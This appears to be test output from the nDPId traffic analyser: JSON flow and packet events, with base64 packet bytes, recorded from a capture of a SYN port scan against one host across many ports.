+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1572,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1562,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAs9AMAADIGIm+sEAAIQA2GNIzTAQjdU4MZAAAAAGACDAArhAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1573,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1573,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1563,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsKpEAADgG5eGsEAAIQA2GNIzTCD\/dU4MZAAAAAGACBAAsTQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1574,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1574,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1564,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAs4xAAADkGLGKsEAAIQA2GNIzTADHdU4MZAAAAAGACCAAwWwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1575,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1575,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1565,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsmJ8AACYGidOsEAAIQA2GNIzTD6LdU4MZAAAAAGACDAAc6gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1576,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1076,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1576,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1566,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsMFwAADAG6BasEAAIQA2GNIzTBDTdU4MZAAAAAGACBAAwWAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1577,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1577,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1567,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsgoUAACoGm+2sEAAIQA2GNIzTBd\/dU4MZAAAAAGACDAAmrQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1578,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1578,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1568,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsxtwAADAGUZasEAAIQA2GNIzTF3HdU4MZAAAAAGACBAAdGwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1579,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1579,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1569,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAs8kIAADQGIjCsEAAIQA2GNIzTgAPdU4MZAAAAAGACBAC0iAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1580,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1580,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1570,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsZjgAAC4GtDqsEAAIQA2GNIzTAaHdU4MZAAAAAGACDAAq6wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1581,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1581,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1571,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsXNkAACsGwJmsEAAIQA2GNIzTH0vdU4MZAAAAAGACEAAJQQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1582,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1582,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1572,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAs4KkAACwGO8msEAAIQA2GNIzTI1DdU4MZAAAAAGACBAARPAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1583,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5226,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1583,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1573,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsHMUAACYGBa6sEAAIQA2GNIzTFGrdU4MZAAAAAGACDAAYIgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1584,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1584,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1574,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsfkQAADQGli6sEAAIQA2GNIzTFiLdU4MZAAAAAGACBAAeagAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1585,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060802,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1947,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1585,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1575,"flow_packet_id":1,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060802,"pkt":"ACYLMQczACWzv5HuCABFAAAs0YwAADMGQ+asEAAIQA2GNIzTB5vdU4MZAAAAAGACEAAg8QAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1586,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060802,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1586,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1576,"flow_packet_id":1,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060802,"pkt":"ACYLMQczACWzv5HuCABFAAAsph4AADQGblSsEAAIQA2GNIzTnQHdU4MZAAAAAGACBACXigAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1587,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060802,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1587,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1577,"flow_packet_id":1,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060802,"pkt":"ACYLMQczACWzv5HuCABFAAAsS7UAACoG0r2sEAAIQA2GNIzTPozdU4MZAAAAAGACDADt\/wAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1588,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060803,"flow_last_seen":1278275060803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060803,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1588,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1578,"flow_packet_id":1,"flow_last_seen":1278275060803,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060803,"pkt":"ACYLMQczACWzv5HuCABFAAAsqPsAADcGaHesEAAIQA2GNIzT0x3dU4MZAAAAAGACEABVbgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1589,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1589,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1579,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsxjsAADYGTDesEAAIQA2GNIzTIPvdU4MZAAAAAGACDAALkQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1590,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3986,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1590,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1580,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsFQcAADMGAGysEAAIQA2GNIzTD5LdU4MZAAAAAGACEAAY+gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1591,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1591,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1581,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsW8oAADQGuKisEAAIQA2GNIzTBFndU4MZAAAAAGACBAAwMwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1592,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1592,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1582,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsd4EAADsGlfGsEAAIQA2GNIzSBFPdUoMYAAAAAGACEAAkPAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1593,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1593,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1583,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsT2YAADIGxwysEAAIQA2GNIzSAnzdUoMYAAAAAGACDAAqEwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1594,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1594,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1584,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsWvQAADMGun6sEAAIQA2GNIzSE77dUoMYAAAAAGACEAAU0QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1595,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1334,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1595,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1585,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAseRIAACwGo2CsEAAIQA2GNIzSBTbdUoMYAAAAAGACBAAvWQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1596,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1596,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1586,"flow_packet_id":1,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060846,"pkt":"ACYLMQczACWzv5HuCABFAAAsrV0AADcGZBWsEAAIQA2GNIzSA\/\/dUoMYAAAAAGACEAAkkAAAAgQFtA=="} 